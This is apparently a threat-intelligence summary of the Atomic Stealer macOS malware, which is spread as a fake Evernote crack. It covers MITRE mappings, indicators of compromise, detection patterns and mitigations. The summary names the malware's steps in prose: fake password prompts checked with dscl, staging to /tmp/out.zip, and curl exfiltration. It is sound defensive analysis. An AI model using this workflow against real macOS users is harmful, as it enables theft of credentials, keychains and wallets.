Full Report
AhnLab SEcurity intelligence Center (ASEC) has discovered the Atomic Stealer malware being distributed disguised as the Evernote Crack program. Atomic Stealer is an information-stealing malware for macOS. It steals data such as browser information, system keychain, wallet, and system information. It is mainly distributed through installation files such as pkg and dmg. When users […]
Analysis Summary
# Tool/Technique: Atomic Stealer
## Overview
Atomic Stealer is an information-stealing malware specifically targeting macOS systems. It is being distributed by threat actors disguised as legitimate software, in this case, an "Evernote Crack program," often redirected to via compromised Google ads or malicious download sites. Its primary purpose is to harvest sensitive data from the victim's machine.
## Technical Details
- Type: Malware family
- Platform: macOS
- Capabilities: Steals browser information, system keychain data, cryptocurrency wallet credentials, and general system information. Employs anti-VM checks.
- First Seen: Not explicitly stated, but recently analyzed by ASEC.
## MITRE ATT&CK Mapping
This analysis maps several observed behaviors:
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information
- Used by disguising as crack software and using installation packages (pkg, dmg).
- T1497 - Virtualization/Sandbox Evasion
- T1497.001 - Virtual Check
- Checks for "QEMU" or "VMware" strings in system metadata.
- **TA0009 - Collection**
- T1005 - Data from Local System
- Collects browser data, system info, Notes, keychains, Telegram, and crypto wallets.
- T1119 - Automated Collection
- Uses `system_profiler` and `SPMemoryDataType`.
- **TA0011 - Command and Control**
- T1071 - Application Layer Protocol
- T1071.001 - Web Protocols (Utilizes HTTP POST requests via `curl`).
## Functionality
### Core Capabilities
- **File Collection:** Explores and collects target files (browsers, keychains, wallets, Notes, Telegram) using AppleScript executed via OSA Script.
- **Data Staging:** Compresses collected data into a file named `out.zip` in the `/tmp` directory using the `ditto` command.
- **Exfiltration:** Sends the compressed data to a threat actor server via a POST request using the `curl` command.
- **Self-Deletion:** Removes the malware artifact after successful exfiltration.
### Advanced Features
- **Environment Evasion:** Actively checks for signs of virtual environments (QEMU, VMware) using system diagnostics (`system_profiler`).
- **Credential Harvesting:** Deceptively prompts the user for their system password under the guise of a legitimate program warning, validating it using `dscl . authonly` and storing it.
- **Initial Execution Bypass (macOS):** On some distribution sites, it requires the user to execute a downloaded shell script (`install.sh`) via the terminal first, likely to preempt or bypass macOS GateKeeper warnings.
- **Platform Biasing:** The distribution site checks the UserAgent: macOS users are directed to Atomic Stealer, while Windows users are redirected to LummaC2 malware installation pages.
## Indicators of Compromise
- File Hashes:
- MD5: `774d14a4fc61176aaefb94468b513289`, `bf9b98fce3c2fefdacdff234837e621b`, `e0030c7976f1d90fd38e4e898e9957e8`
- File Names: `out.zip` (staged archive)
- Registry Keys: Not applicable (focus is macOS)
- Network Indicators:
- `http://192[.]124[.]178[.]88/contact`
- `https://webzal[.]com/get/update`
- Behavioral Indicators: Execution of `system_profiler`, use of `dscl . authonly`, execution of AppleScript via OSA Script, creation of directories and files in `/tmp`, and outbound POST requests via `curl`.
## Associated Threat Actors
The article does not explicitly name the threat actor group using Atomic Stealer in this campaign, but it notes the distribution utilizes tactics often employed by financially motivated cybercriminals targeting macOS users (e.g., software cracks, Google ad redirection).
## Detection Methods
- Signature-based detection: Use file hashes provided.
- Behavioral detection: Monitor for processes using `dscl . authonly` to authenticate user credentials, execution of `system_profiler` followed by file compression in `/tmp`, and outbound connections initiated by unexpected processes using `curl` to exfiltrate data.
- YARA rules: Not provided in the text.
## Mitigation Strategies
- Do not execute scripts or install software downloaded from untrusted sources or third-party sites, especially those offered as "cracks" or free versions of paid software.
- Keep macOS GateKeeper and XProtect security features fully enabled and configured for maximum security.
- Users should be highly cautious when prompted for their system password outside of expected system update or application installation dialogues.
- Review security policies to restrict execution of shell scripts downloaded from the internet.
## Related Tools/Techniques
- **LummaC2:** Malware noted to be distributed to Windows users from the same distribution site structure, indicating a campaign targeting multiple operating systems simultaneously.